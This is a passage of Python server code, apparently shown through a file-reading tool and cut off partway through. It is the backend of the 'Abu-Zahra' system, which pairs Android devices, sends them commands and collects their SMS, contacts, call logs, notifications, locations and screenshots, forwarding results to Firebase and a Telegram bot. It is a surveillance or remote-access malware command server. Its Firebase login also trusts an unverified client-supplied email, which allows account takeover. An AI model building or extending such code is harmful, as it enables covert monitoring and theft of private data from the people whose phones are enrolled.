     1вҶ’     1вҶ’"""
     2вҶ’     2вҶ’API Handlers - All HTTP/WebSocket request handlers for the Abu-Zahra Server.
     3вҶ’     3вҶ’Architecture: Client вҶ’ Server вҶҗ {Web Dashboard, Admin App, Telegram Bot}
     4вҶ’     4вҶ’"""
     5вҶ’     5вҶ’
     6вҶ’     6вҶ’import json
     7вҶ’     7вҶ’import time
     8вҶ’     8вҶ’import uuid
     9вҶ’     9вҶ’import base64
    10вҶ’    10вҶ’import asyncio
    11вҶ’    11вҶ’import logging
    12вҶ’    12вҶ’from aiohttp import web, WSMsgType
    13вҶ’    13вҶ’from datetime import datetime
    14вҶ’    14вҶ’
    15вҶ’    15вҶ’from .config import (
    16вҶ’    16вҶ’    CORS_ORIGINS, VERSION, SERVER_DOMAIN, SERVER_URL,
    17вҶ’    17вҶ’    MAX_UPLOAD_SIZE, JPEG_STREAM_INTERVAL, STREAM_FRAME_CACHE_SIZE
    18вҶ’    18вҶ’)
    19вҶ’    19вҶ’from .store import store
    20вҶ’    20вҶ’from .commands import COMMAND_REGISTRY, CMD_CATEGORIES, get_all_categories
    21вҶ’    21вҶ’from . import firebase_client as _fb
    22вҶ’    22вҶ’from .firebase_client import (
    23вҶ’    23вҶ’    push_command, store_sms, store_contacts,
    24вҶ’    24вҶ’    store_calls, store_notifications, store_device_info, store_location
    25вҶ’    25вҶ’)
    26вҶ’    26вҶ’from .file_storage import save_upload, save_base64_upload, get_file, get_storage_stats
    27вҶ’    27вҶ’from .telegram_bot import forward_result
    28вҶ’    28вҶ’
    29вҶ’    29вҶ’logger = logging.getLogger("api")
    30вҶ’    30вҶ’
    31вҶ’    31вҶ’
    32вҶ’    32вҶ’# в”Җв”Җв”Җ Middleware в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
    33вҶ’    33вҶ’
    34вҶ’    34вҶ’@web.middleware
    35вҶ’    35вҶ’async def cors_middleware(request: web.Request, handler):
    36вҶ’    36вҶ’    if request.method == 'OPTIONS':
    37вҶ’    37вҶ’        resp = web.Response(status=204)
    38вҶ’    38вҶ’    else:
    39вҶ’    39вҶ’        resp = await handler(request)
    40вҶ’    40вҶ’    
    41вҶ’    41вҶ’    origin = request.headers.get('Origin', '')
    42вҶ’    42вҶ’    if origin in CORS_ORIGINS or origin == '':
    43вҶ’    43вҶ’        resp.headers['Access-Control-Allow-Origin'] = origin or CORS_ORIGINS[0]
    44вҶ’    44вҶ’    resp.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE, OPTIONS'
    45вҶ’    45вҶ’    resp.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization, X-Device-Token'
    46вҶ’    46вҶ’    resp.headers['Access-Control-Max-Age'] = '86400'
    47вҶ’    47вҶ’    return resp
    48вҶ’    48вҶ’
    49вҶ’    49вҶ’
    50вҶ’    50вҶ’def get_auth_session(request: web.Request):
    51вҶ’    51вҶ’    """Extract and validate session from Authorization header."""
    52вҶ’    52вҶ’    auth = request.headers.get('Authorization', '')
    53вҶ’    53вҶ’    if not auth.startswith('Bearer '):
    54вҶ’    54вҶ’        return None
    55вҶ’    55вҶ’    token = auth[7:]
    56вҶ’    56вҶ’    return store.validate_session(token)
    57вҶ’    57вҶ’
    58вҶ’    58вҶ’
    59вҶ’    59вҶ’def get_device_auth(request: web.Request):
    60вҶ’    60вҶ’    """Extract device_id and validate device token."""
    61вҶ’    61вҶ’    device_id = request.match_info.get('device_id') or request.query.get('device_id', '')
    62вҶ’    62вҶ’    token = request.headers.get('X-Device-Token', '')
    63вҶ’    63вҶ’    if not device_id or not token:
    64вҶ’    64вҶ’        return None, "Missing device_id or token"
    65вҶ’    65вҶ’    if not store.validate_device_token(device_id, token):
    66вҶ’    66вҶ’        return None, "Invalid device token"
    67вҶ’    67вҶ’    return device_id, None
    68вҶ’    68вҶ’
    69вҶ’    69вҶ’
    70вҶ’    70вҶ’def json_response(data: any, status: int = 200) -> web.Response:
    71вҶ’    71вҶ’    return web.Response(
    72вҶ’    72вҶ’        text=json.dumps(data, ensure_ascii=False, default=str),
    73вҶ’    73вҶ’        content_type='application/json',
    74вҶ’    74вҶ’        status=status
    75вҶ’    75вҶ’    )
    76вҶ’    76вҶ’
    77вҶ’    77вҶ’
    78вҶ’    78вҶ’# в”Җв”Җв”Җ Public Endpoints в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
    79вҶ’    79вҶ’
    80вҶ’    80вҶ’async def api_health(request: web.Request) -> web.Response:
    81вҶ’    81вҶ’    store.api_hits += 1
    82вҶ’    82вҶ’    return json_response({
    83вҶ’    83вҶ’        "ok": True,
    84вҶ’    84вҶ’        "status": "running",
    85вҶ’    85вҶ’        "version": VERSION,
    86вҶ’    86вҶ’        "firebase": _fb.firebase_connected,
    87вҶ’    87вҶ’        "uptime": int(time.time() - store.start_time),
    88вҶ’    88вҶ’        "devices": len(store.devices),
    89вҶ’    89вҶ’        "commands": len(store.commands),
    90вҶ’    90вҶ’    })
    91вҶ’    91вҶ’
    92вҶ’    92вҶ’
    93вҶ’    93вҶ’async def api_login(request: web.Request) -> web.Response:
    94вҶ’    94вҶ’    """Web/Admin login. Accepts username/email + password."""
    95вҶ’    95вҶ’    store.api_hits += 1
    96вҶ’    96вҶ’    try:
    97вҶ’    97вҶ’        body = await request.json()
    98вҶ’    98вҶ’    except:
    99вҶ’    99вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   100вҶ’   100вҶ’    
   101вҶ’   101вҶ’    username_or_email = body.get('username', '').strip()
   102вҶ’   102вҶ’    password = body.get('password', '')
   103вҶ’   103вҶ’    
   104вҶ’   104вҶ’    if not username_or_email or not password:
   105вҶ’   105вҶ’        return json_response({"ok": False, "message": "Missing username or password"}, 400)
   106вҶ’   106вҶ’    
   107вҶ’   107вҶ’    user = await store.authenticate_user(username_or_email, password)
   108вҶ’   108вҶ’    if not user:
   109вҶ’   109вҶ’        return json_response({"ok": False, "message": "Ш§ШіЩ… Ш§Щ„Щ…ШіШӘШ®ШҜЩ… ШЈЩҲ ЩғЩ„Щ…Ш© Ш§Щ„Щ…ШұЩҲШұ ШәЩҠШұ ШөШӯЩҠШӯШ©"}, 401)
   110вҶ’   110вҶ’    
   111вҶ’   111вҶ’    # Create session
   112вҶ’   112вҶ’    ip = request.remote or ""
   113вҶ’   113вҶ’    ua = request.headers.get('User-Agent', '')
   114вҶ’   114вҶ’    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="web")
   115вҶ’   115вҶ’    
   116вҶ’   116вҶ’    await store.add_event("auth", f"User logged in: {user['username']} (web)", "success", user_id=user['id'])
   117вҶ’   117вҶ’    
   118вҶ’   118вҶ’    # Get or create permanent link code
   119вҶ’   119вҶ’    permanent_code = await store.get_or_create_permanent_code(user['id'])
   120вҶ’   120вҶ’
   121вҶ’   121вҶ’    # Sync to Firebase
   122вҶ’   122вҶ’    if _fb.firebase_connected:
   123вҶ’   123вҶ’        from .firebase_client import sync_permanent_code
   124вҶ’   124вҶ’        await sync_permanent_code(user['email'], permanent_code, user['id'])
   125вҶ’   125вҶ’
   126вҶ’   126вҶ’    return json_response({
   127вҶ’   127вҶ’        "ok": True,
   128вҶ’   128вҶ’        "success": True,
   129вҶ’   129вҶ’        "token": session['token'],
   130вҶ’   130вҶ’        "expires_at": session['expires_at'],
   131вҶ’   131вҶ’        "user_id": user['id'],
   132вҶ’   132вҶ’        "username": user['username'],
   133вҶ’   133вҶ’        "role": user['role'],
   134вҶ’   134вҶ’        "email": user['email'],
   135вҶ’   135вҶ’        "permanent_code": permanent_code,
   136вҶ’   136вҶ’        "message": "ШӘЩ… ШӘШіШ¬ЩҠЩ„ Ш§Щ„ШҜШ®ЩҲЩ„ ШЁЩҶШ¬Ш§Шӯ"
   137вҶ’   137вҶ’    })
   138вҶ’   138вҶ’
   139вҶ’   139вҶ’
   140вҶ’   140вҶ’async def api_firebase_auth(request: web.Request) -> web.Response:
   141вҶ’   141вҶ’    """Firebase authentication. Accepts Firebase ID token from Google Sign-In."""
   142вҶ’   142вҶ’    store.api_hits += 1
   143вҶ’   143вҶ’    try:
   144вҶ’   144вҶ’        body = await request.json()
   145вҶ’   145вҶ’    except:
   146вҶ’   146вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   147вҶ’   147вҶ’    
   148вҶ’   148вҶ’    firebase_token = body.get('firebase_token', '').strip()
   149вҶ’   149вҶ’    id_token = body.get('id_token', '').strip()
   150вҶ’   150вҶ’    email = body.get('email', '').strip().lower()
   151вҶ’   151вҶ’    display_name = body.get('display_name', '').strip()
   152вҶ’   152вҶ’    
   153вҶ’   153вҶ’    # Accept either firebase_token or id_token
   154вҶ’   154вҶ’    token = firebase_token or id_token
   155вҶ’   155вҶ’    
   156вҶ’   156вҶ’    if not email:
   157вҶ’   157вҶ’        return json_response({"ok": False, "message": "Ш§Щ„ШЁШұЩҠШҜ Ш§Щ„ШҘЩ„ЩғШӘШұЩҲЩҶЩҠ Щ…Ш·Щ„ЩҲШЁ"}, 400)
   158вҶ’   158вҶ’    
   159вҶ’   159вҶ’    # Try to verify Firebase token if available
   160вҶ’   160вҶ’    verified_email = None
   161вҶ’   161вҶ’    verified_name = None
   162вҶ’   162вҶ’    if token and _fb.firebase_connected:
   163вҶ’   163вҶ’        try:
   164вҶ’   164вҶ’            import requests
   165вҶ’   165вҶ’            # Verify with Firebase Auth REST API
   166вҶ’   166вҶ’            resp = requests.get(
   167вҶ’   167вҶ’                f"https://identitytoolkit.googleapis.com/v1/accounts:lookup?key={token}",
   168вҶ’   168вҶ’                timeout=5
   169вҶ’   169вҶ’            )
   170вҶ’   170вҶ’            if resp.status_code == 200:
   171вҶ’   171вҶ’                data = resp.json()
   172вҶ’   172вҶ’                if data.get('users'):
   173вҶ’   173вҶ’                    user_info = data['users'][0]
   174вҶ’   174вҶ’                    verified_email = user_info.get('email', '').lower()
   175вҶ’   175вҶ’                    verified_name = user_info.get('displayName', '') or user_info.get('localId', '')
   176вҶ’   176вҶ’        except Exception as e:
   177вҶ’   177вҶ’            logger.warning(f"Firebase token verification failed: {e}")
   178вҶ’   178вҶ’    
   179вҶ’   179вҶ’    # Use verified email if available, otherwise trust the provided email
   180вҶ’   180вҶ’    final_email = verified_email or email
   181вҶ’   181вҶ’    final_name = verified_name or display_name or final_email.split('@')[0]
   182вҶ’   182вҶ’    
   183вҶ’   183вҶ’    # Find or create user
   184вҶ’   184вҶ’    user = None
   185вҶ’   185вҶ’    for u in store.users.values():
   186вҶ’   186вҶ’        if u['email'] == final_email:
   187вҶ’   187вҶ’            user = u
   188вҶ’   188вҶ’            break
   189вҶ’   189вҶ’    
   190вҶ’   190вҶ’    if not user:
   191вҶ’   191вҶ’        # Auto-create user from Firebase auth
   192вҶ’   192вҶ’        try:
   193вҶ’   193вҶ’            username = final_name.replace(' ', '_').replace('@', '_')[:20]
   194вҶ’   194вҶ’            # Ensure unique username
   195вҶ’   195вҶ’            base_username = username
   196вҶ’   196вҶ’            counter = 1
   197вҶ’   197вҶ’            while any(u['username'] == username for u in store.users.values()):
   198вҶ’   198вҶ’                username = f"{base_username}_{counter}"
   199вҶ’   199вҶ’                counter += 1
   200вҶ’   200вҶ’            
   201вҶ’   201вҶ’            user = await store.create_user(
   202вҶ’   202вҶ’                email=final_email,
   203вҶ’   203вҶ’                username=username,
   204вҶ’   204вҶ’                password=str(uuid.uuid4()),  # Random password for Firebase users
   205вҶ’   205вҶ’                role="user"
   206вҶ’   206вҶ’            )
   207вҶ’   207вҶ’            logger.info(f"Auto-created user from Firebase: {username} ({final_email})")
   208вҶ’   208вҶ’        except ValueError as e:
   209вҶ’   209вҶ’            return json_response({"ok": False, "message": str(e)}, 400)
   210вҶ’   210вҶ’    
   211вҶ’   211вҶ’    if not user.get('is_active', True):
   212вҶ’   212вҶ’        return json_response({"ok": False, "message": "Ш§Щ„ШӯШіШ§ШЁ Щ…Ш№Ш·Щ„"}, 403)
   213вҶ’   213вҶ’    
   214вҶ’   214вҶ’    # Create session
   215вҶ’   215вҶ’    ip = request.remote or ""
   216вҶ’   216вҶ’    ua = request.headers.get('User-Agent', '')
   217вҶ’   217вҶ’    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="firebase")
   218вҶ’   218вҶ’    
   219вҶ’   219вҶ’    await store.add_event("auth", f"User logged in via Firebase: {user['username']} ({final_email})", "success", user_id=user['id'])
   220вҶ’   220вҶ’    
   221вҶ’   221вҶ’    # Get or create permanent link code
   222вҶ’   222вҶ’    permanent_code = await store.get_or_create_permanent_code(user['id'])
   223вҶ’   223вҶ’    
   224вҶ’   224вҶ’    # Sync to Firebase
   225вҶ’   225вҶ’    if _fb.firebase_connected:
   226вҶ’   226вҶ’        try:
   227вҶ’   227вҶ’            from .firebase_client import sync_permanent_code
   228вҶ’   228вҶ’            await sync_permanent_code(user['email'], permanent_code, user['id'])
   229вҶ’   229вҶ’        except:
   230вҶ’   230вҶ’            pass
   231вҶ’   231вҶ’
   232вҶ’   232вҶ’    return json_response({
   233вҶ’   233вҶ’        "ok": True,
   234вҶ’   234вҶ’        "success": True,
   235вҶ’   235вҶ’        "token": session['token'],
   236вҶ’   236вҶ’        "expires_at": session['expires_at'],
   237вҶ’   237вҶ’        "user_id": user['id'],
   238вҶ’   238вҶ’        "username": user['username'],
   239вҶ’   239вҶ’        "role": user['role'],
   240вҶ’   240вҶ’        "email": user['email'],
   241вҶ’   241вҶ’        "permanent_code": permanent_code,
   242вҶ’   242вҶ’        "message": "ШӘЩ… ШӘШіШ¬ЩҠЩ„ Ш§Щ„ШҜШ®ЩҲЩ„ ШЁЩҶШ¬Ш§Шӯ"
   243вҶ’   243вҶ’    })
   244вҶ’   244вҶ’
   245вҶ’   245вҶ’
   246вҶ’   246вҶ’async def api_web_register(request: web.Request) -> web.Response:
   247вҶ’   247вҶ’    """Register a new user account."""
   248вҶ’   248вҶ’    store.api_hits += 1
   249вҶ’   249вҶ’    try:
   250вҶ’   250вҶ’        body = await request.json()
   251вҶ’   251вҶ’    except:
   252вҶ’   252вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   253вҶ’   253вҶ’    
   254вҶ’   254вҶ’    email = body.get('email', '').strip()
   255вҶ’   255вҶ’    username = body.get('username', '').strip()
   256вҶ’   256вҶ’    password = body.get('password', '').strip()
   257вҶ’   257вҶ’    
   258вҶ’   258вҶ’    if not email or not username or not password:
   259вҶ’   259вҶ’        return json_response({"ok": False, "message": "Ш¬Щ…ЩҠШ№ Ш§Щ„ШӯЩӮЩҲЩ„ Щ…Ш·Щ„ЩҲШЁШ©"}, 400)
   260вҶ’   260вҶ’    
   261вҶ’   261вҶ’    if len(password) < 6:
   262вҶ’   262вҶ’        return json_response({"ok": False, "message": "ЩғЩ„Щ…Ш© Ш§Щ„Щ…ШұЩҲШұ ЩҠШ¬ШЁ ШЈЩҶ ШӘЩғЩҲЩҶ 6 ШЈШӯШұЩҒ Ш№Щ„Щү Ш§Щ„ШЈЩӮЩ„"}, 400)
   263вҶ’   263вҶ’    
   264вҶ’   264вҶ’    if '@' not in email:
   265вҶ’   265вҶ’        return json_response({"ok": False, "message": "ШЁШұЩҠШҜ ШҘЩ„ЩғШӘШұЩҲЩҶЩҠ ШәЩҠШұ ШөШ§Щ„Шӯ"}, 400)
   266вҶ’   266вҶ’    
   267вҶ’   267вҶ’    try:
   268вҶ’   268вҶ’        user = await store.create_user(email=email, username=username, password=password, role="user")
   269вҶ’   269вҶ’    except ValueError as e:
   270вҶ’   270вҶ’        return json_response({"ok": False, "message": str(e)}, 400)
   271вҶ’   271вҶ’    
   272вҶ’   272вҶ’    # Auto-login after registration
   273вҶ’   273вҶ’    ip = request.remote or ""
   274вҶ’   274вҶ’    ua = request.headers.get('User-Agent', '')
   275вҶ’   275вҶ’    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="register")
   276вҶ’   276вҶ’    
   277вҶ’   277вҶ’    await store.add_event("auth", f"New user registered: {username} ({email})", "success", user_id=user['id'])
   278вҶ’   278вҶ’    
   279вҶ’   279вҶ’    # Get permanent code
   280вҶ’   280вҶ’    permanent_code = await store.get_or_create_permanent_code(user['id'])
   281вҶ’   281вҶ’    
   282вҶ’   282вҶ’    if _fb.firebase_connected:
   283вҶ’   283вҶ’        try:
   284вҶ’   284вҶ’            from .firebase_client import sync_permanent_code
   285вҶ’   285вҶ’            await sync_permanent_code(user['email'], permanent_code, user['id'])
   286вҶ’   286вҶ’        except:
   287вҶ’   287вҶ’            pass
   288вҶ’   288вҶ’    
   289вҶ’   289вҶ’    return json_response({
   290вҶ’   290вҶ’        "ok": True,
   291вҶ’   291вҶ’        "success": True,
   292вҶ’   292вҶ’        "token": session['token'],
   293вҶ’   293вҶ’        "expires_at": session['expires_at'],
   294вҶ’   294вҶ’        "user_id": user['id'],
   295вҶ’   295вҶ’        "username": user['username'],
   296вҶ’   296вҶ’        "role": user['role'],
   297вҶ’   297вҶ’        "email": user['email'],
   298вҶ’   298вҶ’        "permanent_code": permanent_code,
   299вҶ’   299вҶ’        "message": "ШӘЩ… ШҘЩҶШҙШ§ШЎ Ш§Щ„ШӯШіШ§ШЁ ШЁЩҶШ¬Ш§Шӯ"
   300вҶ’   300вҶ’    })
   301вҶ’   301вҶ’
   302вҶ’   302вҶ’
   303вҶ’   303вҶ’# в”Җв”Җв”Җ Device API (authenticated by device token) в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
   304вҶ’   304вҶ’
   305вҶ’   305вҶ’async def api_register(request: web.Request) -> web.Response:
   306вҶ’   306вҶ’    """Device registration using pairing code."""""
   307вҶ’   307вҶ’    store.api_hits += 1
   308вҶ’   308вҶ’    try:
   309вҶ’   309вҶ’        body = await request.json()
   310вҶ’   310вҶ’    except:
   311вҶ’   311вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   312вҶ’   312вҶ’    
   313вҶ’   313вҶ’    device_id = body.get('device_id', '')
   314вҶ’   314вҶ’    link_code = body.get('link_code', '')
   315вҶ’   315вҶ’    device_token = body.get('device_token', '') or body.get('token', '')
   316вҶ’   316вҶ’    model = body.get('device_model', '') or body.get('model', '')
   317вҶ’   317вҶ’    brand = body.get('brand', '')
   318вҶ’   318вҶ’    os_version = body.get('os_version', '') or body.get('android', '')
   319вҶ’   319вҶ’    
   320вҶ’   320вҶ’    if not device_id or not link_code:
   321вҶ’   321вҶ’        return json_response({"ok": False, "message": "Missing device_id or link_code"}, 400)
   322вҶ’   322вҶ’    
   323вҶ’   323вҶ’    # Verify pairing code
   324вҶ’   324вҶ’    code_data = await store.verify_pairing_code(link_code)
   325вҶ’   325вҶ’    if not code_data:
   326вҶ’   326вҶ’        return json_response({"ok": False, "message": "ЩғЩҲШҜ Ш§Щ„ШұШЁШ· ШәЩҠШұ ШөШ§Щ„Шӯ ШЈЩҲ Щ…ЩҶШӘЩҮЩҠ Ш§Щ„ШөЩ„Ш§ШӯЩҠШ©"}, 400)
   327вҶ’   327вҶ’    
   328вҶ’   328вҶ’    # Register device
   329вҶ’   329вҶ’    device = await store.register_device(
   330вҶ’   330вҶ’        device_id=device_id,
   331вҶ’   331вҶ’        token=device_token,
   332вҶ’   332вҶ’        pairing_code=link_code,
   333вҶ’   333вҶ’        model=model,
   334вҶ’   334вҶ’        brand=brand,
   335вҶ’   335вҶ’        os_version=os_version,
   336вҶ’   336вҶ’        user_id=code_data.get('user_id'),
   337вҶ’   337вҶ’    )
   338вҶ’   338вҶ’    
   339вҶ’   339вҶ’    if not device:
   340вҶ’   340вҶ’        return json_response({"ok": False, "message": "ЩҒШҙЩ„ ШӘШіШ¬ЩҠЩ„ Ш§Щ„Ш¬ЩҮШ§ШІ"}, 500)
   341вҶ’   341вҶ’    
   342вҶ’   342вҶ’    return json_response({
   343вҶ’   343вҶ’        "ok": True,
   344вҶ’   344вҶ’        "success": True,
   345вҶ’   345вҶ’        "device_id": device_id,
   346вҶ’   346вҶ’        "device_token": device_token,
   347вҶ’   347вҶ’        "server_domain": SERVER_DOMAIN,
   348вҶ’   348вҶ’        "message": "ШӘЩ… ШӘШіШ¬ЩҠЩ„ Ш§Щ„Ш¬ЩҮШ§ШІ ШЁЩҶШ¬Ш§Шӯ"
   349вҶ’   349вҶ’    })
   350вҶ’   350вҶ’
   351вҶ’   351вҶ’
   352вҶ’   352вҶ’async def api_get_commands(request: web.Request) -> web.Response:
   353вҶ’   353вҶ’    """Device fetches pending commands."""
   354вҶ’   354вҶ’    device_id, error = get_device_auth(request)
   355вҶ’   355вҶ’    if error:
   356вҶ’   356вҶ’        return json_response({"ok": False, "message": error}, 401)
   357вҶ’   357вҶ’    
   358вҶ’   358вҶ’    commands = await store.get_pending_commands(device_id)
   359вҶ’   359вҶ’    
   360вҶ’   360вҶ’    # Mark as sent
   361вҶ’   361вҶ’    for cmd in commands:
   362вҶ’   362вҶ’        cmd['sent_at'] = datetime.utcnow().isoformat()
   363вҶ’   363вҶ’    
   364вҶ’   364вҶ’    return json_response({
   365вҶ’   365вҶ’        "ok": True,
   366вҶ’   366вҶ’        "commands": commands,
   367вҶ’   367вҶ’        "count": len(commands),
   368вҶ’   368вҶ’        "server_time": datetime.utcnow().isoformat(),
   369вҶ’   369вҶ’    })
   370вҶ’   370вҶ’
   371вҶ’   371вҶ’
   372вҶ’   372вҶ’async def api_command_result(request: web.Request) -> web.Response:
   373вҶ’   373вҶ’    """Device submits command result."""
   374вҶ’   374вҶ’    store.api_hits += 1
   375вҶ’   375вҶ’    command_id = request.match_info.get('command_id', '')
   376вҶ’   376вҶ’    device_id, error = get_device_auth(request)
   377вҶ’   377вҶ’    if error:
   378вҶ’   378вҶ’        return json_response({"ok": False, "message": error}, 401)
   379вҶ’   379вҶ’    
   380вҶ’   380вҶ’    try:
   381вҶ’   381вҶ’        body = await request.json()
   382вҶ’   382вҶ’    except:
   383вҶ’   383вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   384вҶ’   384вҶ’    
   385вҶ’   385вҶ’    status = body.get('status', 'completed')
   386вҶ’   386вҶ’    result = body.get('result', '')
   387вҶ’   387вҶ’    
   388вҶ’   388вҶ’    updated = await store.update_command_result(command_id, status, result)
   389вҶ’   389вҶ’    
   390вҶ’   390вҶ’    # Forward result to Telegram if pending
   391вҶ’   391вҶ’    if updated and command_id in store.pending_messages:
   392вҶ’   392вҶ’        await forward_result(command_id, result)
   393вҶ’   393вҶ’    
   394вҶ’   394вҶ’    # Store text data in Firebase
   395вҶ’   395вҶ’    if updated and isinstance(result, str) and len(result) < 50000:
   396вҶ’   396вҶ’        cmd = store.commands.get(command_id, {})
   397вҶ’   397вҶ’        cmd_name = cmd.get('command', '')
   398вҶ’   398вҶ’        
   399вҶ’   399вҶ’        if cmd_name in ('get_sms',):
   400вҶ’   400вҶ’            await store_sms(device_id, json.loads(result) if result.startswith('[') else result)
   401вҶ’   401вҶ’        elif cmd_name in ('get_contacts',):
   402вҶ’   402вҶ’            await store_contacts(device_id, json.loads(result) if result.startswith('[') else result)
   403вҶ’   403вҶ’        elif cmd_name in ('get_calls',):
   404вҶ’   404вҶ’            await store_calls(device_id, json.loads(result) if result.startswith('[') else result)
   405вҶ’   405вҶ’        elif cmd_name in ('get_notifications',):
   406вҶ’   406вҶ’            await store_notifications(device_id, json.loads(result) if result.startswith('[') else result)
   407вҶ’   407вҶ’        elif cmd_name in ('get_location',):
   408вҶ’   408вҶ’            await store_location(device_id, json.loads(result) if result.startswith('{') else result)
   409вҶ’   409вҶ’        elif cmd_name in ('get_info', 'get_battery', 'get_wifi_info', 'get_network_info',
   410вҶ’   410вҶ’                          'get_sim_info', 'get_storage_info'):
   411вҶ’   411вҶ’            await store_device_info(device_id, json.loads(result) if result.startswith('{') else {"raw": result})
   412вҶ’   412вҶ’    
   413вҶ’   413вҶ’    # Handle base64 image results - save as temp file
   414вҶ’   414вҶ’    if updated and isinstance(result, str) and len(result) > 10000 and result.startswith('/9j/'):
   415вҶ’   415вҶ’        try:
   416вҶ’   416вҶ’            img_bytes = base64.b64decode(result)
   417вҶ’   417вҶ’            await save_upload(device_id, img_bytes, f"screenshot_{command_id}.jpg",
   418вҶ’   418вҶ’                            file_type="screenshot", command_id=command_id)
   419вҶ’   419вҶ’            # Cache for streaming
   420вҶ’   420вҶ’            store.latest_frames[f"{device_id}:video"] = {
   421вҶ’   421вҶ’                "data": result,
   422вҶ’   422вҶ’                "timestamp": time.time(),
   423вҶ’   423вҶ’                "source": "screenshot",
   424вҶ’   424вҶ’            }
   425вҶ’   425вҶ’        except Exception as e:
   426вҶ’   426вҶ’            logger.error(f"Failed to save screenshot: {e}")
   427вҶ’   427вҶ’    
   428вҶ’   428вҶ’    return json_response({"ok": True, "success": True, "message": "Result received"})
   429вҶ’   429вҶ’
   430вҶ’   430вҶ’
   431вҶ’   431вҶ’async def api_device_data(request: web.Request) -> web.Response:
   432вҶ’   432вҶ’    """Device sends typed data (location, battery, events, etc.)."""
   433вҶ’   433вҶ’    device_id, error = get_device_auth(request)
   434вҶ’   434вҶ’    if error:
   435вҶ’   435вҶ’        return json_response({"ok": False, "message": error}, 401)
   436вҶ’   436вҶ’    
   437вҶ’   437вҶ’    try:
   438вҶ’   438вҶ’        body = await request.json()
   439вҶ’   439вҶ’    except:
   440вҶ’   440вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   441вҶ’   441вҶ’    
   442вҶ’   442вҶ’    data_type = body.get('type', '')
   443вҶ’   443вҶ’    data = body.get('data', {})
   444вҶ’   444вҶ’    command = body.get('command', '')
   445вҶ’   445вҶ’    
   446вҶ’   446вҶ’    # Store in Firebase for text data
   447вҶ’   447вҶ’    if data_type == 'location' and data:
   448вҶ’   448вҶ’        await store_location(device_id, data)
   449вҶ’   449вҶ’    elif data_type == 'sms' and data:
   450вҶ’   450вҶ’        await store_sms(device_id, data if isinstance(data, list) else [data])
   451вҶ’   451вҶ’    elif data_type == 'contacts' and data:
   452вҶ’   452вҶ’        await store_contacts(device_id, data if isinstance(data, list) else [data])
   453вҶ’   453вҶ’    elif data_type == 'calls' and data:
   454вҶ’   454вҶ’        await store_calls(device_id, data if isinstance(data, list) else [data])
   455вҶ’   455вҶ’    elif data_type == 'notifications' and data:
   456вҶ’   456вҶ’        await store_notifications(device_id, data if isinstance(data, list) else [data])
   457вҶ’   457вҶ’    elif data_type == 'device_info' and data:
   458вҶ’   458вҶ’        await store_device_info(device_id, data)
   459вҶ’   459вҶ’    
   460вҶ’   460вҶ’    # Update device info
   461вҶ’   461вҶ’    if data_type == 'location' and isinstance(data, dict):
   462вҶ’   462вҶ’        await store.update_device(device_id, {"location": data})
   463вҶ’   463вҶ’    elif data_type == 'battery' and isinstance(data, (int, float)):
   464вҶ’   464вҶ’        await store.update_device(device_id, {"battery": data})
   465вҶ’   465вҶ’    
   466вҶ’   466вҶ’    return json_response({"ok": True, "success": True, "message": "Data stored"})
   467вҶ’   467вҶ’
   468вҶ’   468вҶ’
   469вҶ’   469вҶ’async def api_heartbeat(request: web.Request) -> web.Response:
   470вҶ’   470вҶ’    """Device heartbeat."""
   471вҶ’   471вҶ’    store.api_hits += 1
   472вҶ’   472вҶ’    try:
   473вҶ’   473вҶ’        body = await request.json()
   474вҶ’   474вҶ’    except:
   475вҶ’   475вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   476вҶ’   476вҶ’    
   477вҶ’   477вҶ’    device_id = body.get('device_id', '')
   478вҶ’   478вҶ’    status = body.get('status', 'online')
   479вҶ’   479вҶ’    battery = body.get('battery')
   480вҶ’   480вҶ’    
   481вҶ’   481вҶ’    if not device_id:
   482вҶ’   482вҶ’        return json_response({"ok": False, "message": "Missing device_id"}, 400)
   483вҶ’   483вҶ’    
   484вҶ’   484вҶ’    await store.update_heartbeat(device_id, status, battery)
   485вҶ’   485вҶ’    
   486вҶ’   486вҶ’    return json_response({"ok": True, "success": True, "message": "Heartbeat received"})
   487вҶ’   487вҶ’
   488вҶ’   488вҶ’
   489вҶ’   489вҶ’async def api_device_event(request: web.Request) -> web.Response:
   490вҶ’   490вҶ’    """Device sends events."""
   491вҶ’   491вҶ’    device_id, error = get_device_auth(request)
   492вҶ’   492вҶ’    if error:
   493вҶ’   493вҶ’        return json_response({"ok": False, "message": error}, 401)
   494вҶ’   494вҶ’    
   495вҶ’   495вҶ’    try:
   496вҶ’   496вҶ’        body = await request.json()
   497вҶ’   497вҶ’    except:
   498вҶ’   498вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   499вҶ’   499вҶ’    
   500вҶ’   500вҶ’    event_type = body.get('event_type', '')
   501вҶ’   501вҶ’    data = body.get('data', {})
   502вҶ’   502вҶ’    
   503вҶ’   503вҶ’    await store.add_event("device", str(data)[:200], "info", device_id=device_id, details=event_type)
   504вҶ’   504вҶ’    
   505вҶ’   505вҶ’    return json_response({"ok": True, "stored": True})
   506вҶ’   506вҶ’
   507вҶ’   507вҶ’
   508вҶ’   508вҶ’async def api_upload_file(request: web.Request) -> web.Response:
